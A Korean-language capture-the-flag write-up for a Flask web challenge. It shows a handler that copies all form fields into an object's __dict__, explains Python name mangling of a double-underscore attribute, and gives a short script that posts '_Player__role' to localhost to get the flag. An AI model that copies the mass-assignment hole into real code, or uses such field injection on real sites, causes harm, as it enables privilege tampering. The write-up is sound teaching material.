1. 개요
web, python class private 멤버 변수 문제
2. 분석
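코드를 보면 다음과 같이 폼 데이터에 role을 넣으면 될 것 같지만, 실제로는 동작하지 않습니다. role은 setter가 없는 property이고 실제 값은 다른 이름의 속성에 저장되어 있어서, __dict__에 role 키를 추가해도 player.role의 결과는 바뀌지 않기 때문입니다.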
# Form payload that sets the public-looking "role" key (this attempt does not work).
data = {"role": "WEREWOLF"}
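Player 클래스를 보면 role은 접두사로 __(언더바 2개)를 붙여서 private처럼 선언했습니다. 다만 Python에서는 이것이 접근 제어가 아니라 이름 변환(name mangling)일 뿐이어서, 클래스 안의 self.__role 은 인스턴스의 __dict__에 _Player__role 이라는 키로 저장됩니다.
그래서 외부에서 접근할 때는 _Player__role 로 접근해야 합니다. index()는 폼의 키를 검증 없이 player.__dict__[k] = v 로 그대로 써 넣기 때문에, 이 이름을 키로 보내면 role 값까지 덮어쓸 수 있습니다. 이런 문제를 막으려면 name, color처럼 허용된 필드만 골라서 대입해야 합니다.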
import os
import random
from flask import Flask, render_template, request, session
# ====================
# Application object; the flag is read from the environment once at import
# time and stored on the app so the view can render it.
app = Flask(__name__)
app.FLAG = os.environ.get("CTF4B_FLAG")
# ====================
class Player:
    """A participant with a name, a color and a randomly drawn role.

    The role is stored in a double-underscore attribute, which Python
    name-mangles to ``_Player__role`` in the instance ``__dict__``. Mangling
    only prevents accidental name clashes; it is not access control.
    """

    def __init__(self):
        # 'WEREWOLF' is not in the pool, so a freshly built player never
        # holds that role on its own.
        role_pool = ['VILLAGER', 'FORTUNE_TELLER', 'PSYCHIC', 'KNIGHT', 'MADMAN']
        self.name = None
        self.color = None
        self.__role = random.choice(role_pool)
        # :-)
        # self.__role = random.choice(['VILLAGER', 'FORTUNE_TELLER', 'PSYCHIC', 'KNIGHT', 'MADMAN', 'WEREWOLF'])

    @property
    def role(self):
        """Return the stored role; the property has no setter."""
        current_role = self.__role
        return current_role

    # :-)
    # @role.setter
    # def role(self, role):
    #     self.__role = role
# ====================
@app.route("/", methods=["GET", "POST"])
def index():
    """Serve the form on GET; on POST build a Player from the form and render it."""
    method = request.method
    if method == 'GET':
        return render_template('index.html')
    if method != 'POST':
        # Any other method falls through without a response, as before.
        return None

    player = Player()
    # NOTE(security): every submitted key is written straight into the
    # instance __dict__ with no allowlist (mass assignment). The request
    # therefore decides which attributes exist on the player, including the
    # name-mangled '_Player__role'. A hardened handler would copy only the
    # expected fields ('name', 'color').
    for field, value in request.form.items():
        player.__dict__[field] = value

    role = player.role
    # The flag is rendered only when the role compares equal to 'WEREWOLF'.
    flag = app.FLAG if role == 'WEREWOLF' else ''
    return render_template(
        'result.html',
        name=player.name,
        color=player.color,
        role=role,
        flag=flag,
    )
# ====================
if __name__ == '__main__':
    # Listen address and port are taken from the environment.
    listen_host = os.getenv("CTF4B_HOST")
    listen_port = os.getenv("CTF4B_PORT")
    app.run(host=listen_host, port=listen_port)
3. exploit
import requests
def get_flag():
    """POST the role field to the local challenge instance and print the reply."""
    target = "http://localhost:80"
    # The key is the name-mangled form of Player.__role, which the server
    # copies into the instance __dict__ unchecked.
    form_fields = {"_Player__role": "WEREWOLF"}
    response = requests.post(target, data=form_fields)
    print('r', response.text)
# Run the request only when executed as a script, not on import.
if __name__ == "__main__":
    get_flag()